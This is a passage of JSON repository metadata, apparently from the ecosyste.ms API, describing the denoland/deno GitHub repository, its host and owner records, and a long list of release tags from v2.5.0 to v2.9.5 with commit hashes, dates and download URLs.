vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denolan